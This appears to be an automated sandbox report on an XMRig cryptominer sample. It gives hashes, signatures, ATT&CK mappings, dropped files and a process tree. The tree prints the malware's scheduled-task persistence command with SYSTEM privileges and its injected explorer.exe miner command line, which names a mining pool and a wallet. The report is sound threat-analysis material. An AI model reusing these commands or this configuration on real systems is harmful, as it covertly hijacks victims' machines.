xmrig | fb49ad3836c334d8d06a36a45994eaa52d7629ecbf765fe46aa53825aef56e56

General

Target

ddd1b892cae78b0b9759353bc4f0b2c6.exe
Size

174KB
MD5

ddd1b892cae78b0b9759353bc4f0b2c6
SHA1

29b088bc617ce93293700232ba864ecc4e5c5493
SHA256

fb49ad3836c334d8d06a36a45994eaa52d7629ecbf765fe46aa53825aef56e56
SHA512

34f60296876e38703027b41f40b2d243a7658693ffb24a7dc71776ae5ec88d0a78f28686fe1ea3598b08287529fbfdccbd4644cb9e3cf620cdab7624dd54a5eb

Score

10^/10

xmrig miner

Malware Config

Signatures

xmrig
XMRig is a high performance, open source, cross platform CPU/GPU miner.
miner xmrig

XMRig Miner Payload 3 IoCs

miner

Processes:

resource	yara_rule
behavioral1/memory/2000-84-0x0000000140000000-0x0000000140758000-memory.dmp	xmrig
behavioral1/memory/2000-85-0x00000001402EB66C-mapping.dmp	xmrig
behavioral1/memory/2000-87-0x0000000140000000-0x0000000140758000-memory.dmp	xmrig

Executes dropped EXE 2 IoCs

Processes:

sihost64.exesmssmanagment.exe

pid process

1612 sihost64.exe
320 smssmanagment.exe
Loads dropped DLL 2 IoCs

Processes:

ddd1b892cae78b0b9759353bc4f0b2c6.exe

pid process

296 ddd1b892cae78b0b9759353bc4f0b2c6.exe
296 ddd1b892cae78b0b9759353bc4f0b2c6.exe
Legitimate hosting services abused for malware hosting/C2 1 TTPs

Web Service
T1102
Suspicious use of SetThreadContext 1 IoCs

Processes:

smssmanagment.exe

description pid process target process

PID 320 set thread context of 2000 320 smssmanagment.exe explorer.exe
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.

System Information Discovery
T1082
Creates scheduled task(s) 1 TTPs 2 IoCs
Schtasks is often used by malware for persistence or to perform post-infection execution.
persistence

Scheduled Task
T1053

Processes:

schtasks.exeschtasks.exe

pid process

1716 schtasks.exe
1348 schtasks.exe
Suspicious behavior: EnumeratesProcesses 3 IoCs

Processes:

ddd1b892cae78b0b9759353bc4f0b2c6.exesmssmanagment.exe

pid process

296 ddd1b892cae78b0b9759353bc4f0b2c6.exe
296 ddd1b892cae78b0b9759353bc4f0b2c6.exe
320 smssmanagment.exe

pid	process
1612	sihost64.exe
320	smssmanagment.exe

pid	process
296	ddd1b892cae78b0b9759353bc4f0b2c6.exe
296	ddd1b892cae78b0b9759353bc4f0b2c6.exe

description	pid	process	target process
PID 320 set thread context of 2000	320	smssmanagment.exe	explorer.exe

pid	process
1716	schtasks.exe
1348	schtasks.exe

pid	process
296	ddd1b892cae78b0b9759353bc4f0b2c6.exe
296	ddd1b892cae78b0b9759353bc4f0b2c6.exe
320	smssmanagment.exe

Suspicious use of AdjustPrivilegeToken 4 IoCs

Processes:

ddd1b892cae78b0b9759353bc4f0b2c6.exesmssmanagment.exeexplorer.exe

description	pid	process
Token: SeDebugPrivilege	296	ddd1b892cae78b0b9759353bc4f0b2c6.exe
Token: SeDebugPrivilege	320	smssmanagment.exe
Token: SeLockMemoryPrivilege	2000	explorer.exe
Token: SeLockMemoryPrivilege	2000	explorer.exe

Suspicious use of WriteProcessMemory 34 IoCs

Processes:

ddd1b892cae78b0b9759353bc4f0b2c6.execmd.exesmssmanagment.execmd.exe

description	pid	process	target process
PID 296 wrote to memory of 1276	296	ddd1b892cae78b0b9759353bc4f0b2c6.exe	cmd.exe
PID 296 wrote to memory of 1276	296	ddd1b892cae78b0b9759353bc4f0b2c6.exe	cmd.exe
PID 296 wrote to memory of 1276	296	ddd1b892cae78b0b9759353bc4f0b2c6.exe	cmd.exe
PID 1276 wrote to memory of 1716	1276	cmd.exe	schtasks.exe
PID 1276 wrote to memory of 1716	1276	cmd.exe	schtasks.exe
PID 1276 wrote to memory of 1716	1276	cmd.exe	schtasks.exe
PID 296 wrote to memory of 1612	296	ddd1b892cae78b0b9759353bc4f0b2c6.exe	sihost64.exe
PID 296 wrote to memory of 1612	296	ddd1b892cae78b0b9759353bc4f0b2c6.exe	sihost64.exe
PID 296 wrote to memory of 1612	296	ddd1b892cae78b0b9759353bc4f0b2c6.exe	sihost64.exe
PID 296 wrote to memory of 320	296	ddd1b892cae78b0b9759353bc4f0b2c6.exe	smssmanagment.exe
PID 296 wrote to memory of 320	296	ddd1b892cae78b0b9759353bc4f0b2c6.exe	smssmanagment.exe
PID 296 wrote to memory of 320	296	ddd1b892cae78b0b9759353bc4f0b2c6.exe	smssmanagment.exe
PID 320 wrote to memory of 564	320	smssmanagment.exe	cmd.exe
PID 320 wrote to memory of 564	320	smssmanagment.exe	cmd.exe
PID 320 wrote to memory of 564	320	smssmanagment.exe	cmd.exe
PID 564 wrote to memory of 1348	564	cmd.exe	schtasks.exe
PID 564 wrote to memory of 1348	564	cmd.exe	schtasks.exe
PID 564 wrote to memory of 1348	564	cmd.exe	schtasks.exe
PID 320 wrote to memory of 2000	320	smssmanagment.exe	explorer.exe
PID 320 wrote to memory of 2000	320	smssmanagment.exe	explorer.exe
PID 320 wrote to memory of 2000	320	smssmanagment.exe	explorer.exe
PID 320 wrote to memory of 2000	320	smssmanagment.exe	explorer.exe
PID 320 wrote to memory of 2000	320	smssmanagment.exe	explorer.exe
PID 320 wrote to memory of 2000	320	smssmanagment.exe	explorer.exe
PID 320 wrote to memory of 2000	320	smssmanagment.exe	explorer.exe
PID 320 wrote to memory of 2000	320	smssmanagment.exe	explorer.exe
PID 320 wrote to memory of 2000	320	smssmanagment.exe	explorer.exe
PID 320 wrote to memory of 2000	320	smssmanagment.exe	explorer.exe
PID 320 wrote to memory of 2000	320	smssmanagment.exe	explorer.exe
PID 320 wrote to memory of 2000	320	smssmanagment.exe	explorer.exe
PID 320 wrote to memory of 2000	320	smssmanagment.exe	explorer.exe
PID 320 wrote to memory of 2000	320	smssmanagment.exe	explorer.exe
PID 320 wrote to memory of 2000	320	smssmanagment.exe	explorer.exe
PID 320 wrote to memory of 2000	320	smssmanagment.exe	explorer.exe

C:\Users\Admin\AppData\Local\Temp\ddd1b892cae78b0b9759353bc4f0b2c6.exe
"C:\Users\Admin\AppData\Local\Temp\ddd1b892cae78b0b9759353bc4f0b2c6.exe"
1⤵
- Loads dropped DLL
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:296

C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /c schtasks /create /f /sc onlogon /rl highest /tn "smssmanagment" /tr '"C:\Users\Admin\AppData\Roaming\smssmanagment.exe"' /RU "SYSTEM" & exit
2⤵
- Suspicious use of WriteProcessMemory
PID:1276

C:\Windows\system32\schtasks.exe
schtasks /create /f /sc onlogon /rl highest /tn "smssmanagment" /tr '"C:\Users\Admin\AppData\Roaming\smssmanagment.exe"' /RU "SYSTEM"
3⤵
- Creates scheduled task(s)
PID:1716

C:\Users\Admin\AppData\Roaming\Microsoft\Libs\sihost64.exe
"C:\Users\Admin\AppData\Roaming\Microsoft\Libs\sihost64.exe"
2⤵
- Executes dropped EXE
PID:1612

C:\Users\Admin\AppData\Roaming\smssmanagment.exe
"C:\Users\Admin\AppData\Roaming\smssmanagment.exe"
2⤵
- Executes dropped EXE
- Suspicious use of SetThreadContext
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:320

C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /c schtasks /create /f /sc onlogon /rl highest /tn "smssmanagment" /tr '"C:\Users\Admin\AppData\Roaming\smssmanagment.exe"' /RU "SYSTEM" & exit
3⤵
- Suspicious use of WriteProcessMemory
PID:564

C:\Windows\system32\schtasks.exe
schtasks /create /f /sc onlogon /rl highest /tn "smssmanagment" /tr '"C:\Users\Admin\AppData\Roaming\smssmanagment.exe"' /RU "SYSTEM"
4⤵
- Creates scheduled task(s)
PID:1348

C:\Windows\explorer.exe
C:\Windows\explorer.exe --cinit-find-x -B --algo=rx/0 --asm=auto --cpu-memory-pool=1 --randomx-mode=auto --randomx-no-rdmsr --cuda-bfactor-hint=12 --cuda-bsleep-hint=100 --url=xmr-eu1.nanopool.org:14433 --user=4AXqAB3xATp3qXvA883jjVbbvQtqtFoVPLy79LU8TjqiWkK71DnXYAkRsgExycBRqsJ4yBNxAFnqvNmz6KhCDv1Z622gFLs.w2/explorer --pass= --cpu-max-threads-hint=50 --cinit-remote-config="qWmSJPvneRNQfbpvLXoXBy3JpXXnkAtHjwumY21IlTMeLBYzClnsyLDbzMvGOMO4" --donate-level=0 --cinit-idle-wait=5 --cinit-idle-cpu=100 --tls --cinit-stealth
3⤵
- Suspicious use of AdjustPrivilegeToken
PID:2000

Network

MITRE ATT&CK Matrix ATT&CK v6

Initial Access

Execution

Scheduled Task

1

T1053

Persistence

Scheduled Task

1

T1053

Privilege Escalation

Scheduled Task

1

T1053

Defense Evasion

Credential Access

Discovery

System Information Discovery

1

T1082

Lateral Movement

Collection

Exfiltration

Command and Control

Web Service

1

T1102

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\AppData\Roaming\Microsoft\Libs\WR64.sys
MD5
0c0195c48b6b8582fa6f6373032118da

SHA1
d25340ae8e92a6d29f599fef426a2bc1b5217299

SHA256
11bd2c9f9e2397c9a16e0990e4ed2cf0679498fe0fd418a3dfdac60b5c160ee5

SHA512
ab28e99659f219fec553155a0810de90f0c5b07dc9b66bda86d7686499fb0ec5fddeb7cd7a3c5b77dccb5e865f2715c2d81f4d40df4431c92ac7860c7e01720d

Download Submit
C:\Users\Admin\AppData\Roaming\Microsoft\Libs\sihost64.exe
MD5
0cc367a450bda510269c7713f3aa524b

SHA1
ab797cc8e89cd47d1ad2cb4f76d2d13902b874bb

SHA256
ab60ee3173ebff3c672f43977d06324910110984c8531311061ce720b1e5f4fa

SHA512
0431f79473110907645d7c69bd7f3d924018aa7927830a749927764027cb5d669904dca004100a3e1392277388c8356577eec7999d71b8f76ef00d6e13e8c11a

Download Submit
C:\Users\Admin\AppData\Roaming\Microsoft\Libs\sihost64.exe
MD5
0cc367a450bda510269c7713f3aa524b

SHA1
ab797cc8e89cd47d1ad2cb4f76d2d13902b874bb

SHA256
ab60ee3173ebff3c672f43977d06324910110984c8531311061ce720b1e5f4fa

SHA512
0431f79473110907645d7c69bd7f3d924018aa7927830a749927764027cb5d669904dca004100a3e1392277388c8356577eec7999d71b8f76ef00d6e13e8c11a

Download Submit
C:\Users\Admin\AppData\Roaming\smssmanagment.exe
MD5
ddd1b892cae78b0b9759353bc4f0b2c6

SHA1
29b088bc617ce93293700232ba864ecc4e5c5493

SHA256
fb49ad3836c334d8d06a36a45994eaa52d7629ecbf765fe46aa53825aef56e56

SHA512
34f60296876e38703027b41f40b2d243a7658693ffb24a7dc71776ae5ec88d0a78f28686fe1ea3598b08287529fbfdccbd4644cb9e3cf620cdab7624dd54a5eb

Download Submit
C:\Users\Admin\AppData\Roaming\smssmanagment.exe
MD5
ddd1b892cae78b0b9759353bc4f0b2c6

SHA1
29b088bc617ce93293700232ba864ecc4e5c5493

SHA256
fb49ad3836c334d8d06a36a45994eaa52d7629ecbf765fe46aa53825aef56e56

SHA512
34f60296876e38703027b41f40b2d243a7658693ffb24a7dc71776ae5ec88d0a78f28686fe1ea3598b08287529fbfdccbd4644cb9e3cf620cdab7624dd54a5eb

Download Submit
\Users\Admin\AppData\Roaming\Microsoft\Libs\sihost64.exe
MD5
0cc367a450bda510269c7713f3aa524b

SHA1
ab797cc8e89cd47d1ad2cb4f76d2d13902b874bb

SHA256
ab60ee3173ebff3c672f43977d06324910110984c8531311061ce720b1e5f4fa

SHA512
0431f79473110907645d7c69bd7f3d924018aa7927830a749927764027cb5d669904dca004100a3e1392277388c8356577eec7999d71b8f76ef00d6e13e8c11a

Download Submit
\Users\Admin\AppData\Roaming\smssmanagment.exe
MD5
ddd1b892cae78b0b9759353bc4f0b2c6

SHA1
29b088bc617ce93293700232ba864ecc4e5c5493

SHA256
fb49ad3836c334d8d06a36a45994eaa52d7629ecbf765fe46aa53825aef56e56

SHA512
34f60296876e38703027b41f40b2d243a7658693ffb24a7dc71776ae5ec88d0a78f28686fe1ea3598b08287529fbfdccbd4644cb9e3cf620cdab7624dd54a5eb

Download Submit
memory/296-61-0x00000000007C0000-0x00000000007CC000-memory.dmp

Filesize
48KB

Download
memory/296-62-0x000000001C930000-0x000000001C932000-memory.dmp

Filesize
8KB

Download
memory/296-59-0x000000013F4F0000-0x000000013F4F1000-memory.dmp

Filesize
4KB

Download
memory/320-83-0x00000000020D0000-0x00000000020D2000-memory.dmp

Filesize
8KB

Download
memory/320-74-0x000000013F670000-0x000000013F671000-memory.dmp

Filesize
4KB

Download
memory/320-70-0x0000000000000000-mapping.dmp

Download
memory/320-79-0x0000000002180000-0x0000000002182000-memory.dmp

Filesize
8KB

Download
memory/564-80-0x0000000000000000-mapping.dmp

Download
memory/1276-63-0x0000000000000000-mapping.dmp

Download
memory/1348-81-0x0000000000000000-mapping.dmp

Download
memory/1612-66-0x0000000000000000-mapping.dmp

Download
memory/1612-77-0x0000000000750000-0x0000000000752000-memory.dmp

Filesize
8KB

Download
memory/1612-72-0x000000013F680000-0x000000013F681000-memory.dmp

Filesize
4KB

Download
memory/1716-64-0x0000000000000000-mapping.dmp

Download
memory/2000-84-0x0000000140000000-0x0000000140758000-memory.dmp

Filesize
7.3MB

Download
memory/2000-85-0x00000001402EB66C-mapping.dmp

Download
memory/2000-86-0x0000000001E00000-0x0000000001E20000-memory.dmp

Filesize
128KB

Download
memory/2000-87-0x0000000140000000-0x0000000140758000-memory.dmp

Filesize
7.3MB

Download
memory/2000-88-0x0000000001FB0000-0x0000000001FD0000-memory.dmp

Filesize
128KB

Download

Analysis

Sharing

General

Malware Config

Signatures

Processes

Network

MITRE ATT&CK Matrix ATT&CK v6

Replay Monitor

Loading Replay Monitor...

Downloads